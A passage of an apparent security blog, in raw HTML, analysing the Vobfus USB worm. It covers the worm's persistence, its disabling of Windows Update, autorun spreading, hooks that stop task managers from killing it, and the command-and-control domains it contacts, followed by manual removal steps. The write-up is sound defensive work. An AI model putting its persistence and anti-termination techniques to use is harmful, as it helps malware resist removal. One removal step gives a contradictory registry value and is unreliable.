drives including the created autorun.inf, ert.dll and shortcuts that point to
vobfus.<o:p></o:p></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">
</span></span><br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">As a recommendation, run a full system scan
using Vipre to completely remove possible remnants of the malware.</span><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div>
<h3>
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">SUMMARY</span></span></h3>
<div>
<span lang="EN-US"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Platforms</i></b>: WINXP, WIN7, WIN8 x64<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>File-type:
</i></b>Win32 PE<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Malware-type:</i></b>
WORM<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Vtest first
seen date:</i></b> 12/29/2013 22:02<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Vipre
detection name:</i></b> Trojan.Win32.Generic!BT<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Installation</i></b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Dropped files</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: .75in;">
</div>
<ul>
<li><span style="font-family: inherit;">%USERPROFILE%\<RandomFileName>.exe (copy of
malware)</span></li>
<li><span style="font-family: inherit;">Adds copy of itself to removable and shared
drives (including floppy A:\) and may have filenames</span></li>
<li><span style="font-family: inherit;">Adds shortcut links pointing to the malware in
removable/shared drives such as:</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Documents.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Music.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">New Folder.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Passwords.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Pictures.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">Video.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zAS.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zbI.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zdG.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zKU.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zTn.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zug.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zww.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zYh.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.25in;">
<span lang="EN-US"><span style="font-family: inherit;">zYJ.lnk<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: .75in;">
</div>
<ul>
<li><span style="font-family: inherit;">Creates autorun.inf file in removable/shared
drives and points to malware copy</span></li>
<li><span style="font-family: inherit;">May also drop another Trojan in removable/shared
drives with filename ert.dll</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Added registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe - to
execute vobfus at system startup</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Modified registry</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001) – to hide vobfus
dropped copy from users</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Memory Residency</i></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Invoked processes</i>:
%USERPROFILE%\<RandomFileName>.exe (malware dropped copy)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><i><b>Backdoor/Bot/Stealer</b></i></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Communicates to/from</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><span lang="EN-US">Attempts to connect to</span><span lang="EN-US" style="background-color: white; line-height: 115%;"> </span><span lang="EN-US">ns4.theimageparlour.net</span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>Propagates</i></b><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Method of spreading</i>: copies itself
into removable and mapped network drives.</span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><i><b>General
Malware</b></i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span lang="EN-US"><span style="font-family: inherit;"><i>Summary of payload</i><o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 1in;">
</div>
<ul>
<li><span style="font-family: inherit;">drops malware copies to removable
and mapped network drives</span></li>
<li><span style="font-family: inherit;">modifies TerminateProcess and
TerminateThread APIs loaded in every process except those process listed in its
list to prevent them from terminating vobfus malware</span></li>
<li><span style="font-family: inherit;">may attempt to connect to outside
address in order to download updated copy of itself</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Pertinent
APIs used </i></b></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">advapi32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CloseHandle<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">connect<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CreateToolhelp32Snapshot<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetDiskFreeSpaceExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetDriveTypeW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetFileAttributesW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLocaleInfoW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLogicalDrives<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetLogicalDriveStringsW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">CreateMutexW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetModuleHandleW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">GetUserNameW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">ExitProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">htons<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetCloseHandle<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetOpenUrlW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetOpenW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">InternetReadFile<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">kernel32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">OpenProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">Process32First<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">shell32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">ShellExecuteW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">SHGetSpecialFolderPathW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">Sleep<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">socket<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">TerminateProcess<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">user32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">wininet<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WriteProcessMemory<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WSAAsyncSelect<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">WSAStartup<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">wsock32<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegCreateKeyExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegSetValueExW<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.75in;">
<span lang="EN-US"><span style="font-family: inherit;">RegCloseKey<o:p></o:p></span></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span lang="EN-US"><span style="font-family: inherit;"><b><i>What makes
it unique</i></b>: Visual Basic compiled and obfuscation techniques</span></span><span lang="EN-US" style="color: #595959; font-size: 10.0pt;"><o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
</span></div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-10601326622106955132014-05-01T19:41:00.000-07:002014-05-01T19:41:11.045-07:00Native Vobfus Malware<h3>
<span style="font-family: inherit; font-size: large;">ANALYSIS</span></h3>
<div class="MsoNormal">
<span style="font-family: inherit;">VOBFUS – stands for VB Obfuscated malware, is a Visual Basic compiled (pseudo code or native code) malware that demonstrates obfuscation techniques with the purpose of eluding signature based detections by most antivirus softwares.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">The sample being analyzed (a5e979799c725b45c39cfe87257107d2) is native code compiled. Let’s skip all the obfuscation techniques and focus on what the actual vobfus malware does.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">At some point after the malware’s self-de-obfuscation in memory, a call to MSVBVM60.rtcStrConvVar2 API will be performed and the actual vobfus strings (in Unicode format) will be revealed. Based solely on the revealed strings, we can now at least have a vague idea on what it does or what it will do.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z-oE1-1q89kfBlHsWf0BW5g6FemMS7NtIbWki5Nb99YEjbEKwR_fKoEz3YGefIHoTGt8LQ2kDZzsc6Wy5_fTs2Tff6yIcDkSmca7-cteIQlZCADrh6C1YDyn1m6zEc2jjiOY59Hp/s1600/rtcStrConvVar2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z-oE1-1q89kfBlHsWf0BW5g6FemMS7NtIbWki5Nb99YEjbEKwR_fKoEz3YGefIHoTGt8LQ2kDZzsc6Wy5_fTs2Tff6yIcDkSmca7-cteIQlZCADrh6C1YDyn1m6zEc2jjiOY59Hp/s1600/rtcStrConvVar2.png" height="135" width="320" /></span></a></div>
<div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">The malware uses MSVBVM60.DllFunctionCall in
order to execute Windows API functions (APIs like CreateToolhelp32Snapshot,
GetDiskFreeSpaceExW, GetUserNameW, etc.).<o:p></o:p></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div>
<span lang="EN-US" style="line-height: 115%;"><br /></span></div>
The figure below demonstrates how kernel32.sleep
is traversed using MSVBVM60.DllFunctionCall.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOZ8_J5neyzJXVRj1XYxfPNW6suf3tcGwnWwR5ThDgeu9JVFGb7-38eWs1y4SsnAr8kQ79jz-q0R-pyuueICkqA0XyV1q6sjK7X_Dpcg__6ztxWHtZiqie6YsL8BLE78ZeNq5BgK5/s1600/DllFunctionCall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOZ8_J5neyzJXVRj1XYxfPNW6suf3tcGwnWwR5ThDgeu9JVFGb7-38eWs1y4SsnAr8kQ79jz-q0R-pyuueICkqA0XyV1q6sjK7X_Dpcg__6ztxWHtZiqie6YsL8BLE78ZeNq5BgK5/s1600/DllFunctionCall.png" height="90" width="320" /></span></a></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US">First and foremost, it will gather
information about the system like username, logical drives, drive types, and
disk free space. It will create a mutex named “A” upon execution.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">Vobfus will create a copy of itself as
%USERPROFILE%\<RandomFileName>.exe with file attributes set to READONLY,
HIDDEN, and SYSTEM and proceeds to execute it.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<span lang="EN-US" style="line-height: 115%;">Using CreateToolhelp32Snapshot, Process32First
and Process32Next APIs, it will search thru running processes and monitors for
the presence of strings such as “task” (for task manager) or “proc” (for process
explorer). When found existing, it will prevent users from manually closing the
malware by hooking to TerminateProcess and TerminateThread APIs loaded into
task manager or process explorer so that when this APIs are triggered, it will
just do nothing. It does this by using WriteProcessMemory API and replaces the
first byte of TerminateProcess and TerminateThread API to 0xC3 (RETN).</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWvSaGGRJXZf00qlNoS7wWe3W-yxsIMPP8VzS4mgflci_qxuExCNEMOR1dGBZDVWqHSGW3WDKlSHT-TqzdSJlDJ6YZq3BnMoc_Xs_xgVpsHqbIJzcSMnNLS9Py0VAqyw0e1OARTseJ/s1600/WriteProcessMemory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWvSaGGRJXZf00qlNoS7wWe3W-yxsIMPP8VzS4mgflci_qxuExCNEMOR1dGBZDVWqHSGW3WDKlSHT-TqzdSJlDJ6YZq3BnMoc_Xs_xgVpsHqbIJzcSMnNLS9Py0VAqyw0e1OARTseJ/s1600/WriteProcessMemory.png" height="39" width="320" /></span></a></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US">It then creates its REGRUN entry to ensure
activation every system startup.<br />
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It disables windows update by adding this
registry entry
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU] “NoAutoUpdate”
= dword:00000001.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It will also set the folder settings to
hide system files (files with properties set to SYSTEM) in order to conceal the
malware away from easy inspection. It does this by modifying the registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001).<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It then attempts to connect to the
following sites (sending the information gathered earlier) and may attempt to
download an updated copy of itself.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.com<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.net<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.org<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It will also try to copy itself into
removable drives like floppy, USB, etc. with filenames such as Passwords.exe,
Porn.exe, Secret.exe and Sexy.exe. An autorun.inf file will also be created in
the removable drive that will point to the malware copy in order to
automatically execute it when the drive is mounted. A file x.mpeg may also be
created but with 0 bytes in size.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<span lang="EN-US" style="line-height: 115%;">It also modifies/updates ICON resource section
of the files Passwords.exe, Porn.exe, Secret.exe and Sexy.exe in an attempt to
avoid CRC signature based detection of some antivirus softwares.</span></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
<h3>
<span style="line-height: 21.527999877929688px;"><span style="font-family: inherit; font-size: large;">MANUAL REMEDIATION</span></span></h3>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">In
order to successfully restore the system, first and foremost is we have to find
a way on how to kill the vobfus malware running as a process. Remember that
vobfus monitors for running processes with names having “task” or “proc” and
when found, will hook TerminateProcess and TerminateThread that successfully
prevents task manager or process explorer’s ability to terminate processes. So,
to solve this problem, we can actually trick the malware by renaming process
explorer’s executable to any name as long as it does not contain “task” or
“proc” keywords.</span></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
<div>
<span lang="EN-US"><span lang="EN-US"><div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">To put it in steps:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Rename procexp.exe to 1.exe.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Run 1.exe (copy of procexp.exe).</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Terminate vobfus malware in memory.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Delete the following registry entries using regedit:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>a.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] “<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>b.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU] “NoAutoUpdate” = dword:00000001</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">5.<span class="Apple-tab-span" style="white-space: pre;"> </span>Modify the following registry entry using regedit:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>a.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] “ShowSuperHidden” = dword:00000000 (from dword:00000001 to see hidden system files in explorer.)</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">6.<span class="Apple-tab-span" style="white-space: pre;"> </span>Manually delete copies of malware found in %USERPROFILE%\<RandomFileName>.exe and removable drives including the created autorun.inf, x.mpeg, Passwords.exe, Porn.exe, Secret.exe and Sexy.exe.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">7.<span class="Apple-tab-span" style="white-space: pre;"> </span>As a recommendation, run a full system scan using Vipre to completely remove possible remnants of the malware.</span></span></div>
</div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span></div>
<h3>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit; font-size: large;"><b>SUMMARY</b></span></span></h3>
<div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Platforms</b></i>: WINXP, WIN7, WIN8 x64<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>File-type</b></i>: Win32 PE<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Malware-type</b></i>: WORM<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Vtest first seen date</b></i>:
12/31/2013 02:58<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Vipre detection name</b></i>: Trojan.Win32.Generic!BT<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Installation</b></i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Dropped files</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
</div>
<ul>
<li><span style="font-family: inherit;">%USERPROFILE%\<RandomFileName>.exe (copy of
malware)</span></li>
<li><span style="font-family: inherit;">Adds copy of itself to removable drives (including floppy
A:\) and may have filenames such as <i>Passwords.exe,
Porn.exe, Secret.exe, Sexy.exe</i></span></li>
<li><span style="font-family: inherit;">Creates autorun.inf file in removable drives and points
to malware copy</span></li>
<li><span style="font-family: inherit;">May create x.mpeg file in removable drives with 0 bytes</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Added registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe - to
execute vobfus at system startup</span></li>
<li><span style="font-family: inherit;">[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU]
“NoAutoUpdate” = dword:00000001 – to prevent windows update on system</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Modified registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001) – to hide vobfus
dropped copy from users</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<i><span style="font-family: inherit;">Memory Residency</span></i></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Invoked processes</i>:
